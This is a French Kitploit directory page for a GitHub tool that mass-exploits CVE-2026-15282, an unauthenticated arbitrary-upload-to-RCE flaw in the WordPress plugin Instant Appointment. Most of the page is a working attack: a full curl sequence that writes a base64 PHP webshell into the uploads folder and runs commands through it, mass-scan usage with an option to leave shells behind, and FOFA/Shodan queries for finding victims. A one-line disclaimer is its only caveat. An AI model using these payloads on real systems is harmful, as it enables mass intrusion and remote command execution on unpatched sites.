Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-15282 — Instant Appointment <= 1.2 — Upload de fichier arbitraire non authentifié en RCE via add_service_front AJAX | CVSS 9.8 | Kitploit
Outils/GitHubGitHub/shinthink/cve-2026-15282
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubshinthink/cve-2026-15282

CVE-2026-15282

Instant Appointment <= 1.2 — Upload de fichier arbitraire non authentifié en RCE via add_service_front AJAX | CVSS 9.8

Voir le dépôt
2il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-15282 — Exploit RCE de masse pour Instant Appointment

file_get_contents() pré-authentification + file_put_contents() → Webshell PHP


Aperçu

CVE-2026-15282 est une vulnérabilité critique (CVSS 9.8) de téléversement arbitraire de fichier sans authentification dans le plugin WordPress Instant Appointment (≤ 1.2).

L'action AJAX add_service_front est enregistrée via wp_ajax_nopriv_ pour un accès non authentifié. Le gestionnaire passe les variables et fournies par l'utilisateur directement à et sans aucune validation de type ou d'extension de fichier.

image_url
image_name
file_get_contents()
file_put_contents()

Versions affectées

VersionStatut
≤ 1.2Vulnérable
> 1.2Aucun correctif disponible — supprimez le plugin

Mécanisme de la vulnérabilité

Cause racine

root@kitploit:~
// ajax_services.php
function insapp_upload_image_as_attachment($image_url, $file_name, $product_id) {
    $image_data = file_get_contents($image_url);       // downloads from ANY URL
    $file = $upload_dir['path'] . '/' . $file_name;    // uses attacker's filename
    file_put_contents($file, $image_data);             // no extension check!
}

Le gestionnaire AJAX accepte n'importe quel image_url (y compris les URI data://) et écrit dans n'importe quel image_name directement dans le répertoire de téléversement de WordPress.

Flux d'attaque

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=add_service_front
  image_url=data://text/plain;base64,PD9waHAgc3lzdGVt...
  image_name=think_xxx.php
→ PHP webshell written to wp-content/uploads/YYYY/MM/think_xxx.php
→ RCE via https://target.com/wp-content/uploads/YYYY/MM/think_xxx.php?c=id

Installation

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-15282.git
cd CVE-2026-15282
pip install -r requirements.txt

Utilisation

root@kitploit:~
python cve_2026_15282.py -t target.com
python cve_2026_15282.py -f targets.txt -o shells.txt
python cve_2026_15282.py -t target.com --debug
python cve_2026_15282.py -t target.com --no-cleanup

Arguments

root@kitploit:~
  -t, --target      Cible unique
  -f, --file        Liste de cibles
  -o, --output      Enregistrer les URL RCE dans un fichier
  --threads         Travailleurs (par défaut: 25)
  --no-cleanup      Laisser les shells sur la cible
  --debug           Afficher chaque requête
  -v, --verbose     Sortie verbeuse

Preuve de concept

Cible unique

root@kitploit:~
$ python cve_2026_15282.py -t target.com
root@kitploit:~
  ⠋ Scanning target...  →  OK Scanning target...

  Host       : target.com
  Plugin     : YES
  Upload     : YES
  RCE        : YES
  Shell      : https://target.com/wp-content/uploads/2026/07/think_a1b2c3.php?c=id
  Output     : uid=33(www-data) gid=33(www-data)

Scan de masse

root@kitploit:~
  [.] current-target.com | ⠋ [████░░░░░░░░░░░░░] 45/500 (9%) Plugin:12 UP:3 RCE:1
  [RCE] target.com   https://target.com/wp-content/uploads/2026/07/think_xxx.php

Exploitation manuelle

root@kitploit:~
# 1. Create base64-encoded PHP shell
echo '<?php system($_GET["c"]); ?>' | base64 -w0

# 2. Upload via AJAX
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=add_service_front' \
  -d 'service_name=test' \
  -d 'image_url=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==' \
  -d 'image_name=shell.php' \
  -d 'image_size=100' \
  -d 'image_type=image/jpeg' \
  -d 'service_price_sale=1' \
  -d 'service_price_reg=1' \
  -d 'service_category[]=1' \
  -d 'service_duration=60' \
  -d 'service_author=1'

# 3. Access shell
curl -sk 'https://target.com/wp-content/uploads/2026/07/shell.php?c=id'

FOFA / Shodan

root@kitploit:~
FOFA:   body="wp-content/plugins/instant-appointment"
Shodan: http.html:"instant-appointment"

Avertissement

À DES FINS ÉDUCATIVES ET DE TEST AUTORISÉ UNIQUEMENT.


Références

RessourceLien
WPScanwpscan.com/vulnerability/b3457e95
Wordfencewordfence.com
NVDCVE-2026-15282
ChercheurRandom Robbie (What Security)

Non affilié à tenteeglobal ou Instant Appointment.

Télécharger l’outil